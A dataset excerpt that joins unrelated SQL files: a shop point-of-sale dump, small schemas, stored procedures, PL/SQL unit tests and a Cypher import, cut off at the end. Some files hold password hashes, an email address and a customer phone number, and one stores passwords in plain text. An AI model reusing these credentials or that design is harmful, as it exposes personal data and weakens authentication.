text
stringlengths
6
9.38M
-- phpMyAdmin SQL Dump -- version 4.2.11 -- http://www.phpmyadmin.net -- -- Host: 127.0.0.1 -- Generation Time: Jan 18, 2018 at 08:17 PM -- Server version: 5.6.21 -- PHP Version: 5.6.3 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; -- -- Database: `spos` -- DELIMITER $$ -- -- Procedures -- CREATE DEFINER=`root`@`localhost` PROCEDURE `update_stok_barang`(IN `kode_barang_param` INT(10), IN `jumlah_transaksi_detil_param` SMALLINT) NO SQL BEGIN DECLARE eof INT DEFAULT FALSE; DECLARE kode INT(10); DECLARE jumlah SMALLINT; DECLARE BRG CURSOR FOR SELECT kode_barang, jumlah_transaksi_detil FROM transaksi_detil WHERE kode_barang=kode_barang_param; DECLARE CONTINUE HANDLER FOR NOT FOUND SET eof=TRUE; OPEN BRG; BRG_LOOP: LOOP FETCH BRG INTO kode, jumlah; IF (eof) THEN LEAVE BRG_LOOP; END IF; UPDATE barang SET stok_barang= (stok_barang - (jumlah_transaksi_detil_param * jumlah)) WHERE kode_barang=kode; END LOOP; CLOSE BRG; END$$ CREATE DEFINER=`root`@`localhost` PROCEDURE `update_total_biaya`(IN `kode_transaksi_param` INT(10) UNSIGNED) NO SQL UPDATE transaksi SET total_biaya_transaksi= (SELECT SUM(transaksi_detil.jumlah_transaksi_detil * barang.harga_barang) FROM transaksi_detil, barang WHERE transaksi_detil.kode_barang=barang.kode_barang AND transaksi_detil.kode_transaksi=kode_transaksi_param) WHERE kode_transaksi=kode_transaksi_param$$ DELIMITER ; -- -------------------------------------------------------- -- -- Table structure for table `barang` -- CREATE TABLE IF NOT EXISTS `barang` ( `kode_barang` int(10) unsigned NOT NULL, `nama_barang` varchar(100) COLLATE utf8_unicode_ci NOT NULL, `harga_barang` int(10) unsigned NOT NULL, `stok_barang` int(10) unsigned NOT NULL, `deskripsi_barang` text COLLATE utf8_unicode_ci NOT NULL, `gambar_barang` varchar(150) COLLATE utf8_unicode_ci NOT NULL ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- -- Dumping data for table `barang` -- INSERT INTO `barang` (`kode_barang`, `nama_barang`, `harga_barang`, `stok_barang`, `deskripsi_barang`, `gambar_barang`) VALUES (1, 'Sepatu Biker Oranye', 40000, 43, 'Sepatu all bike adalah salah satu produk yang dikhususkan untuk para bikers sejati. Dengan style yang keren dan model terbaru nyaman dipakai untuk bersepeda dan maupun santai. Terbuat dari bahan polymer dan anti air. Dilbagian sisinya dilengkapi ventilasi udara untuk menjaga kelembapan kaki saat dipakai.', '69a76c5bde0d0f95d6400f44338127d5.jpg'), (3, 'Sepatu Pantofel Premium Hitam', 278000, 47, 'Absolute Black sangat populer karena menjadi sepatu pantofel yang paling banyak diminati oleh customers. Berbahan dasar kalep dengan sol campuran karet dan sintetis. Selain itu sepatu ini sangat ringat untuk dipakai. Dengan model yang simple dan elegant membuat harimu semakin percaya diri.', '67f1eba8eeaee94cee0d32abf0268b23.png'), (7, 'Sepatu Bata', 125000, 47, 'Sepatu BataSepatu BataSepatu BataSepatu BataSepatu BataSepatu BataSepatu Bata', 'b9e5b6bb49a1c70747739c4aabd01941.jpg'); -- -------------------------------------------------------- -- -- Table structure for table `otoritas` -- CREATE TABLE IF NOT EXISTS `otoritas` ( `kode_otoritas` varchar(10) COLLATE utf8_unicode_ci NOT NULL, `nama_otoritas` varchar(30) COLLATE utf8_unicode_ci NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- -- Dumping data for table `otoritas` -- INSERT INTO `otoritas` (`kode_otoritas`, `nama_otoritas`) VALUES ('cashier', 'Kasir'), ('keeper', 'Penjaga Toko'), ('root', 'Administrator'), ('supervisor', 'Supervisor'); -- -------------------------------------------------------- -- -- Table structure for table `pegawai` -- CREATE TABLE IF NOT EXISTS `pegawai` ( `kode_pegawai` varchar(15) COLLATE utf8_unicode_ci NOT NULL, `kata_sandi_pegawai` varchar(150) COLLATE utf8_unicode_ci NOT NULL, `nama_pegawai` char(50) COLLATE utf8_unicode_ci NOT NULL, `gambar_pegawai` varchar(150) COLLATE utf8_unicode_ci NOT NULL, `kode_otoritas` varchar(10) COLLATE utf8_unicode_ci NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- -- Dumping data for table `pegawai` -- INSERT INTO `pegawai` (`kode_pegawai`, `kata_sandi_pegawai`, `nama_pegawai`, `gambar_pegawai`, `kode_otoritas`) VALUES ('conan', '$2y$10$LuzQRHEEOF3htQonJdhdo.WM9knedYj.8p4l5dYo.hki47VDSw0X2', 'Edogawa Conan', 'c4ac205f96bb5684f4c89fd232eeffe4.png', 'root'), ('genta', '$2y$10$v6i601q65WZf38rg8OwWp.O0aSH8wEjTg7WGKKFdG03PV560CCJLm', 'Genta Kojima', 'a469e1f6d17e14c64e1a65bd97b608ff.jpg', 'keeper'), ('haibara', '$2y$10$IqmCTJ2/lx5vKf6bmKvXTuSD5dcczZN28g/0qZOZ2BzWdE0XC/BDW', 'Haibara Ai', 'ef4da66c0f89eaf51b9714471f2286b2.jpg', 'supervisor'), ('mitsuhiko', '$2y$10$myshpn.r1Rs1EVl/LzXQZe9tNgiyPXsQUuvBsPysf.yZFAwV9yoSi', 'Mitsuhiko Tsuburaya', '78ef10272f60fefd9991f247d83eb942.jpg', 'cashier'), ('toor', '$2y$10$vZL7k48cANSMuhsoaFK.VOBH7Lwe.VnPNhLv0h69jkzYJ8sBUagUO', 'Raka Suryaardi Widjaja', '5ae6f0ad3bf564dd2ad1466162d67779.png', 'root'); -- -------------------------------------------------------- -- -- Table structure for table `transaksi` -- CREATE TABLE IF NOT EXISTS `transaksi` ( `kode_transaksi` int(10) unsigned NOT NULL, `tanggal_transaksi` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `total_biaya_transaksi` int(10) unsigned NOT NULL DEFAULT '0', `total_bayar_transaksi` int(10) unsigned NOT NULL DEFAULT '0', `keterangan_transaksi` text COLLATE utf8_unicode_ci NOT NULL, `nama_pembeli` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `nomor_telepon` varchar(15) COLLATE utf8_unicode_ci NOT NULL, `kode_pegawai` varchar(15) COLLATE utf8_unicode_ci NOT NULL ) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- -- Dumping data for table `transaksi` -- INSERT INTO `transaksi` (`kode_transaksi`, `tanggal_transaksi`, `total_biaya_transaksi`, `total_bayar_transaksi`, `keterangan_transaksi`, `nama_pembeli`, `nomor_telepon`, `kode_pegawai`) VALUES (24, '2018-01-15 13:11:54', 165000, 200000, 'Garansi retur barang 1 minggu.', 'Raka Suryaardi Widjaja', '087825720207', 'conan'), (25, '2018-01-15 22:34:39', 278000, 300000, '', '', '', 'conan'), (26, '2018-01-16 18:31:07', 205000, 210000, '', '', '', 'conan'), (27, '2018-01-18 19:01:06', 278000, 290000, '', '', '', 'toor'); -- -------------------------------------------------------- -- -- Table structure for table `transaksi_detil` -- CREATE TABLE IF NOT EXISTS `transaksi_detil` ( `kode_transaksi_detil` int(10) unsigned NOT NULL, `jumlah_transaksi_detil` smallint(5) unsigned NOT NULL, `kode_barang` int(10) unsigned NOT NULL, `kode_transaksi` int(10) unsigned NOT NULL ) ENGINE=InnoDB AUTO_INCREMENT=23 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; -- -- Dumping data for table `transaksi_detil` -- INSERT INTO `transaksi_detil` (`kode_transaksi_detil`, `jumlah_transaksi_detil`, `kode_barang`, `kode_transaksi`) VALUES (17, 1, 1, 24), (18, 1, 7, 24), (19, 1, 3, 25), (20, 1, 7, 26), (21, 2, 1, 26), (22, 1, 3, 27); -- -- Triggers `transaksi_detil` -- DELIMITER // CREATE TRIGGER `TRANSAKSI_DETIL_AFTER_INSERT` AFTER INSERT ON `transaksi_detil` FOR EACH ROW BEGIN CALL update_total_biaya(new.kode_transaksi); CALL update_stok_barang(new.kode_barang, new.jumlah_transaksi_detil); END // DELIMITER ; -- -- Indexes for dumped tables -- -- -- Indexes for table `barang` -- ALTER TABLE `barang` ADD PRIMARY KEY (`kode_barang`); -- -- Indexes for table `otoritas` -- ALTER TABLE `otoritas` ADD PRIMARY KEY (`kode_otoritas`); -- -- Indexes for table `pegawai` -- ALTER TABLE `pegawai` ADD PRIMARY KEY (`kode_pegawai`), ADD UNIQUE KEY `user_name` (`kode_pegawai`), ADD KEY `user_auth` (`kode_otoritas`); -- -- Indexes for table `transaksi` -- ALTER TABLE `transaksi` ADD PRIMARY KEY (`kode_transaksi`), ADD KEY `kode_pegawai` (`kode_pegawai`); -- -- Indexes for table `transaksi_detil` -- ALTER TABLE `transaksi_detil` ADD PRIMARY KEY (`kode_transaksi_detil`), ADD KEY `kode_barang` (`kode_barang`,`kode_transaksi`), ADD KEY `kode_transaksi` (`kode_transaksi`); -- -- AUTO_INCREMENT for dumped tables -- -- -- AUTO_INCREMENT for table `barang` -- ALTER TABLE `barang` MODIFY `kode_barang` int(10) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=8; -- -- AUTO_INCREMENT for table `transaksi` -- ALTER TABLE `transaksi` MODIFY `kode_transaksi` int(10) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=28; -- -- AUTO_INCREMENT for table `transaksi_detil` -- ALTER TABLE `transaksi_detil` MODIFY `kode_transaksi_detil` int(10) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=23; -- -- Constraints for dumped tables -- -- -- Constraints for table `pegawai` -- ALTER TABLE `pegawai` ADD CONSTRAINT `pegawai_ibfk_1` FOREIGN KEY (`kode_otoritas`) REFERENCES `otoritas` (`kode_otoritas`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Constraints for table `transaksi` -- ALTER TABLE `transaksi` ADD CONSTRAINT `transaksi_ibfk_2` FOREIGN KEY (`kode_pegawai`) REFERENCES `pegawai` (`kode_pegawai`) ON DELETE CASCADE ON UPDATE CASCADE; -- -- Constraints for table `transaksi_detil` -- ALTER TABLE `transaksi_detil` ADD CONSTRAINT `transaksi_detil_ibfk_1` FOREIGN KEY (`kode_transaksi`) REFERENCES `transaksi` (`kode_transaksi`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `transaksi_detil_ibfk_2` FOREIGN KEY (`kode_barang`) REFERENCES `barang` (`kode_barang`) ON DELETE CASCADE ON UPDATE CASCADE; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
DROP TABLE IF EXISTS gender; CREATE TABLE gender( value SMALLINT PRIMARY KEY, property VARCHAR(30) NOT NULL ); INSERT INTO gender (value, property) VALUES (1, 'Male'); INSERT INTO gender (value, property) VALUES (2, 'Female');
CREATE TABLE viaje_autobus ( matricula VARCHAR2(16) NOT NULL, viaje_id DATE NOT NULL, CONSTRAINT viaje_autobus_pk PRIMARY KEY(matricula, viaje_id), CONSTRAINT viaje_autobus_viaje_fk FOREIGN KEY(viaje_id) REFERENCES viaje(fecha_inicio) ON DELETE CASCADE, CONSTRAINT viaje_autobus_autobus_fk FOREIGN KEY(matricula) REFERENCES autobus(matricula) ON DELETE CASCADE );
-- MySQL Workbench Forward Engineering SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0; SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0; SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES'; -- ----------------------------------------------------- -- Schema superherodb -- ----------------------------------------------------- -- ----------------------------------------------------- -- Schema superherodb -- ----------------------------------------------------- CREATE SCHEMA IF NOT EXISTS `superherodb` DEFAULT CHARACTER SET utf8 ; USE `superherodb` ; -- ----------------------------------------------------- -- Table `superherodb`.`teams` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `superherodb`.`teams` ( `TeamId` INT NOT NULL AUTO_INCREMENT, `Name` VARCHAR(45) NULL, PRIMARY KEY (`TeamId`)) ENGINE = InnoDB; -- ----------------------------------------------------- -- Table `superherodb`.`heroes` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `superherodb`.`heroes` ( `HeroId` INT NOT NULL AUTO_INCREMENT, `RealName` VARCHAR(45) NULL, `SuperheroName` VARCHAR(45) NULL, `IsVillain` TINYINT NULL, `Power` VARCHAR(45) NULL, `TeamId` INT NOT NULL, PRIMARY KEY (`HeroId`), INDEX `fk_heroes_teams_idx` (`TeamId` ASC), CONSTRAINT `fk_heroes_teams` FOREIGN KEY (`TeamId`) REFERENCES `superherodb`.`teams` (`TeamId`) ON DELETE NO ACTION ON UPDATE NO ACTION) ENGINE = InnoDB; SET SQL_MODE=@OLD_SQL_MODE; SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS; SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
CREATE TABLE `users` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(45) NOT NULL, `balance` int(11) NOT NULL DEFAULT '100000', `version` int(11) NOT NULL DEFAULT '0', `createdate` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `modifieddate` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
-- https://www.urionlinejudge.com.br/judge/en/problems/view/2609 select c.name, sum(products.amount) from products join categories c on products.id_categories = c.id group by c.name
--database drop database safelocality; create database safelocality; use safelocality; --User table CREATE TABLE `User` ( `UserId` BIGINT NULL AUTO_INCREMENT, `UserName` VARCHAR(255) NULL, `FirstName` VARCHAR(255) NULL, `LastName` VARCHAR(255) NULL, `Useremail` VARCHAR(255) NULL, `UserPassword` VARCHAR(255) NULL, PRIMARY KEY (`UserId`)); --select database --User storedprocedure DELIMITER $$ CREATE DEFINER=`root`@`localhost` PROCEDURE `sp_createUser`( IN p_name VARCHAR(255), IN p_firstname VARCHAR(255), IN p_lastname VARCHAR(255), IN p_email VARCHAR(255), IN p_password VARCHAR(255) ) BEGIN if ( select exists (select 1 from User where Useremail = p_email) ) THEN select 'User Exists !!'; ELSE insert into User ( UserName, FirstName, LastName, Useremail, UserPassword ) values ( p_name, p_firstname, p_lastname, p_email, p_password ); END IF; END$$ DELIMITER ; --Validate Sign in DELIMITER $$ CREATE DEFINER=`root`@`localhost` PROCEDURE `sp_validateLogin`( IN p_useremail VARCHAR(255) ) BEGIN select * from User where Useremail = p_useremail; END$$ DELIMITER; --Coordinates Table CREATE TABLE Coordinates( Loc_id BIGINT NULL AUTO_INCREMENT, Loc_name VARCHAR(255), Loc_lat Float, Loc_long Float, PRIMARY KEY (`Loc_id`) ); CREATE TABLE LifeStyle( UserId BIGINT NULL, Loc_id BIGINT NULL, Water INT NULL, Electricity INT NULL, Network_Availability INT NULL, Cleanliness INT NULL, Green_space INT NULL, Local_Entertainment INT NULL, NightLife INT NULL, Repairmen_avail INT NULL, Education INT NULL, Neighbourhood INT NULL, PRIMARY KEY(`UserId`), FOREIGN KEY(UserId) REFERENCES User(UserId), FOREIGN KEY(Loc_id) REFERENCES Coordinates(Loc_id) ); CREATE TABLE Security( UserId BIGINT NULL, Loc_id BIGINT NULL, Theft BIGINT NULL, Violence BIGINT NULL, Harassment BIGINT NULL, PRIMARY KEY(`UserId`), FOREIGN KEY(UserId) REFERENCES User(UserId), FOREIGN KEY(Loc_id) REFERENCES Coordinates(Loc_id) ); --addStats PROCEDURE Lifestyle DROP procedure IF EXISTS `sp_addStats`; DELIMITER $$ CREATE PROCEDURE `sp_addStats`( IN p_userid INT, IN p_locid INT, IN p_water INT, IN p_electricty INT, IN p_network_availability INT, IN p_cleanliness INT, IN p_greenspace INT, IN p_local_Entertainment INT, IN p_nightlife INT, IN p_repairmen_avail INT, IN p_education INT, IN p_neighbourhood INT ) BEGIN insert into LifeStyle ( UserId, Loc_id, Water, Electricity, Network_Availability, Cleanliness, Green_space, Local_Entertainment, NightLife, Repairmen_avail, Education, Neighbourhood ) values ( p_userid, p_locid, p_water, p_electricty, p_network_availability, p_cleanliness, p_greenspace, p_local_Entertainment, p_nightlife, p_repairmen_avail, p_education, p_neighbourhood ); END$$ DELIMITER ; ; --addStats Security PROCEDURE DROP procedure IF EXISTS `sp_addStats_sec`; DELIMITER $$ CREATE PROCEDURE `sp_addStats_sec`( IN p_userid INT, IN p_locid INT, IN p_theft INT, IN p_violence INT, IN p_harassment INT ) BEGIN insert into safelocality( UserId, Loc_id, Theft, Violence, Harassment ) values ( p_userid, p_locid, p_theft, p_violence, p_harassment ); END$$ DELIMITER ; ; --add Location DELIMITER $$ DROP procedure IF EXISTS `sp_addLoc`; CREATE DEFINER=`root`@`localhost` PROCEDURE `sp_addLoc`( IN p_locname VARCHAR(255), IN p_lat Float, IN p_lon Float ) BEGIN insert into Coordinates ( Loc_name, Loc_lat, Loc_long ) values ( p_locname, p_lat, p_lon ); END$$ DELIMITER ; --Insert commands Insert into LifeStyle values(6,2,8,5,7,9,4,3,7,8,5,10); Insert into Security values(4,2,2,8,5); Insert into Security values(6,3,6,5,9); Insert into Security values(7,1,8,7,10); Insert into Security values(10,2,6,8,5); Insert into Security values(11,3,5,7,10);
insert into car (MAKE, MODEL, production_start_date, production_end_date) values ('dummyString', 'dummyString', 3, 3);
DELIMITER // DROP FUNCTION IF EXISTS fnValidateLogin // CREATE FUNCTION fnValidateLogin(pEmail VARCHAR(45), pPassword VARCHAR(100)) returns INT DETERMINISTIC BEGIN IF EXISTS (SELECT username FROM user where email = pEmail AND password = pPassword) THEN RETURN fnGetUserID((select username from user where email = pEmail)); ELSE RETURN 0; END IF; END // delimiter ; select fnValidateLogin("edamazzio@gmail.com", "XohImNooBHFR0OVvjcYpJ3NgPQ1qq73WKhHvch0VQtg=");
CREATE OR REPLACE PACKAGE pkg_unit_testing IS PROCEDURE prc_add_department_test; PROCEDURE prc_adjust_dep_test; PROCEDURE prc_remove_department_test; PROCEDURE prc_add_employee_test; PROCEDURE prc_adjust_emp_test; PROCEDURE prc_remove_employee_test; END; / CREATE OR REPLACE PACKAGE BODY pkg_unit_testing IS PROCEDURE prc_add_employee_test IS BEGIN BEGIN pkg_hr_employees.prc_add_employee(208,'Adi','Ghita','Aghitax','0761502592',to_date('12.03.2016','DD.MM.YYYY'),'MK_MAN',1000,null,100,20); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL INSERT STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO INSERT'); END; BEGIN pkg_hr_employees.prc_add_employee(208,'Adi','Ghita','Aghitax','0761502592',to_date('12.03.2016','DD.MM.YYYY'),'MK_MAN',1000,null,100,20); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL INSERT STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO INSERT'); END; BEGIN pkg_hr_employees.prc_add_employee(208,'Adi','adsda','sasafe','0761502592',to_date('12.03.2016','DD.MM.YYYY'),'MK_MAN',1000,null,100,20); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL INSERT STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO INSERT'); END; END; PROCEDURE prc_adjust_emp_test IS BEGIN BEGIN pkg_hr_employees.prc_adjust_employee_data(4565,'aaaww','Gdddd','Aghitax','0761502592',to_date('12.03.2016','DD.MM.YYYY'),'MK_MAN',1000,null,100,20); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL UPDATE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO UPDATE'); END; BEGIN pkg_hr_employees.prc_adjust_employee_data(208,'Adi','Ghita','Aghitax','0761502592',to_date('12.03.2016','DD.MM.YYYY'),'M_MAN',1000,null,100,20); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL UPDATE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO UPDATE'); END; BEGIN pkg_hr_employees.prc_adjust_employee_data(208,'Adi','Ghita','Aghitax','0761502592',to_date('12.03.2016','DD.MM.YYYY'),'MK_MAN',1000,null,100,20); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL UPDATE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO UPDATE'); END; END; PROCEDURE prc_remove_employee_test IS BEGIN BEGIN pkg_hr_employees.prc_remove_employee(205); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL DELETE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO DELETE'); END; BEGIN pkg_hr_employees.prc_remove_employee(350); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL DELETE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO DELETE'); END; END; PROCEDURE prc_add_department_test IS BEGIN BEGIN pkg_hr_departments.prc_add_department(190,'saddsdd',null,2400); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL INSERT STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO INSERT'); END; BEGIN pkg_hr_departments.prc_add_department(270,'wwwwwww',null,2600); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL INSERT STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO INSERT'); END; BEGIN pkg_hr_departments.prc_add_department(23434,'SASFFX',null,2400); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL INSERT STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO INSERT'); END; END; PROCEDURE prc_adjust_dep_test IS BEGIN BEGIN pkg_hr_departments.prc_adjust_department_data(260,'zzzzzz',null,1700); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL UPDATE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO UPDATE'); END; BEGIN pkg_hr_departments.prc_adjust_department_data(666,'alalala',null,2400); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL UPDATE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO UPDATE'); END; BEGIN pkg_hr_departments.prc_adjust_department_data(11,'sdffsf',null,2400); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL UPDATE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO UPDATE'); END; END; PROCEDURE prc_remove_department_test IS BEGIN BEGIN pkg_hr_departments.prc_remove_department(300); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL DELETE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO DELETE'); END; BEGIN pkg_hr_departments.prc_remove_department(350); DBMS_OUTPUT.PUT_LINE('SUCCESSFUL DELETE STATEMENT'); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('FAILED TO DELETE'); END; END; END; /
// Music Analytics on Graph Database // Santos Borom 2021 // License: Creative Commons License CREATE CONSTRAINT ON (y:YearsTmp) ASSERT y.year IS UNIQUE; // musical character is for year CALL apoc.load.csv('file:///data_by_year.csv', {headers: true} ) YIELD map AS row WITH toString(row.year) AS year, toFloat(row.popularity) AS popularity, toFloat(row.valence) AS valence, toFloat(row.acousticness) AS acousticness, toFloat(row.danceability) AS danceability, toFloat(row.energy) AS energy, toFloat(row.instrumentalness) AS instrumentalness, toFloat(row.loudness) AS loudness, toFloat(row.liveness) AS liveness, toFloat(row.speechiness) AS speechiness, toFloat(row.tempo) AS tempo, toInteger(row.mode) AS mode, toInteger(row.key) AS key MERGE (y:YearsTmp { year: year }) ON CREATE SET y.popularity = popularity, y.valence = valence, y.acousticness = acousticness, y.danceability = danceability, y.energy = energy, y.instrumentalness = instrumentalness, y.liveness = liveness, y.loudness = loudness, y.speechiness = speechiness, y.tempo = tempo, y.key = key, y.mode = mode
--Problem 10 SELECT EmployeeID ,FirstName ,LastName ,Salary ,DENSE_RANK() over (partition by Salary ORDER BY EmployeeID) AS [RANK] FROM Employees WHERE Salary BETWEEN '10000' AND '50000' ORDER BY Salary DESC
CREATE TABLE IF NOT EXISTS `m_staff_assignment_history` ( `id` bigint(20) NOT NULL AUTO_INCREMENT, `centre_id` bigint(20) DEFAULT NULL, `staff_id` bigint(20) NOT NULL, `start_date` date NOT NULL, `end_date` date DEFAULT NULL, `createdby_id` bigint(20) DEFAULT NULL, `created_date` datetime DEFAULT NULL, `lastmodified_date` datetime DEFAULT NULL, `lastmodifiedby_id` bigint(20) DEFAULT NULL, PRIMARY KEY (`id`), KEY `FK_m_staff_assignment_history_centre_id_m_group` (`centre_id`), KEY `FK_m_staff_assignment_history_m_staff` (`staff_id`), CONSTRAINT `FK_m_staff_assignment_history_centre_id_m_group` FOREIGN KEY (`centre_id`) REFERENCES `m_group` (`id`), CONSTRAINT `FK_m_staff_assignment_history_m_staff` FOREIGN KEY (`staff_id`) REFERENCES `m_staff` (`id`) ); INSERT INTO stretchy_parameter ( parameter_name, parameter_variable, parameter_label, parameter_displayType, parameter_FormatType, parameter_default, special, selectOne, selectAll, parameter_sql, parent_id) VALUES ('selectCenterId', 'centerId', 'Enter Center Id', 'text', 'string', 'n/a', NULL, NULL, NULL, NULL, NULL); INSERT INTO stretchy_report ( report_name, report_type, report_subtype, report_category, report_sql, description, core_report, use_report) VALUES ( 'Staff Assignment History', 'Pentaho', NULL, NULL, NULL, NULL, 0, 1); INSERT INTO stretchy_report_parameter ( report_id, parameter_id, report_parameter_name) VALUES ((select sr.id from stretchy_report sr where sr.report_name='Staff Assignment History'), (select sp.id from stretchy_parameter sp where sp.parameter_name='selectCenterId'), 'centerId');
SELECT * FROM costumes WHERE costumeid = :costumeid
create table employees( id int(10) not null AUTO_INCREMENT, first_name varchar(50) , last_name varchar(50) , age int(3) , email_address varchar(100) , PRIMARY KEY (id), UNIQUE KEY(email_address) ); insert into employees(first_name,last_name,age,email_address) values ('Sudheer','P','32','sudheer@pie.com'); insert into employees(first_name,last_name,age,email_address) values ('Waseem','A','30','waseem@pie.com'); insert into employees(first_name,last_name,age,email_address) values ('Nitin','K','32','nitin@pie.com'); insert into employees(first_name,last_name,age,email_address) values ('Manju','G','38','manju@pie.com'); insert into employees(first_name,last_name,age,email_address) values ('Sunil','R','33','sunil@pie.com');
-- -- Drop tables in reverse order -- DROP TABLE IF EXISTS Settings; DROP TABLE IF EXISTS MediaSessionInvitation; DROP TABLE IF EXISTS MediaSelection_ThumbsDownUsers; DROP TABLE IF EXISTS MediaSelection_ThumbsUpUsers; DROP TABLE IF EXISTS MediaSessionUser; DROP TABLE IF EXISTS MediaSelection; DROP TABLE IF EXISTS MediaSession_WatchableType; DROP TABLE IF EXISTS MediaSession; DROP TABLE IF EXISTS UserWatchable; DROP TABLE IF EXISTS FriendRequest; DROP TABLE IF EXISTS Friendship; DROP TABLE IF EXISTS User_Device; DROP TABLE IF EXISTS Device; DROP TABLE IF EXISTS User; DROP TABLE IF EXISTS FacebookAccount; DROP TABLE IF EXISTS FileEntity; DROP TABLE IF EXISTS Season_Episode; DROP TABLE IF EXISTS Series_Season; DROP TABLE IF EXISTS Season; DROP TABLE IF EXISTS Watchable_Actor; DROP TABLE IF EXISTS Watchable_Genre; DROP TABLE IF EXISTS Watchable; DROP TABLE IF EXISTS Person;
-- phpMyAdmin SQL Dump -- version 4.1.14 -- http://www.phpmyadmin.net -- -- Host: 127.0.0.1 -- Generation Time: 17-Mar-2017 às 07:30 -- Versão do servidor: 5.6.17 -- PHP Version: 5.5.12 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; -- -- Database: `jogovideoke` -- -- -------------------------------------------------------- -- -- Estrutura da tabela `tb_candidatos` -- CREATE TABLE IF NOT EXISTS `tb_candidatos` ( `idCandidatos` int(11) NOT NULL AUTO_INCREMENT, `nome` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `idade` int(2) NOT NULL, `imagem` varchar(50) COLLATE utf8_unicode_ci NOT NULL, `data` timestamp NOT NULL, `situacao` int(1) NOT NULL, PRIMARY KEY (`idCandidatos`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=23 ; -- -- Extraindo dados da tabela `tb_candidatos` -- INSERT INTO `tb_candidatos` (`idCandidatos`, `nome`, `idade`, `imagem`, `data`, `situacao`) VALUES (1, 'Weder Monteiro', 32, 